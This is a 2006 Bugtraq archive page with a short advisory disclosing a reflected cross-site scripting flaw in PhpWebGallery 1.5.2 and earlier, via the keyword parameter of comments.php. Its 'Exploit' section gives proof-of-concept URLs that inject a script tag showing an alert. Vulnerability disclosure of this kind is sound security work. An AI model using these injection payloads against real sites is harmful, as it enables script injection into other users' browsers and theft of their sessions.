Home page logo
/

bugtraq logo Bugtraq mailing list archives

PhpWebGallery Cross Site Scripting Vulnerability
From: iss4m.h () gmail com
Date: 4 Jul 2006 00:00:03 -0000

Produce : PhpWebGallery <= 1.5.2
Site    : http://www.phpwebgallery.net
Problem : XSS
Greetz  : hasnaa and all friends

Moroccan Security Research Team

Vulnerable file : comments.php

Exploit :

http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]

http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E

Contact  : iss4m.h () gmail com


  By Date           By Thread  

Current thread:
  • PhpWebGallery Cross Site Scripting Vulnerability iss4m . h (Jul 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault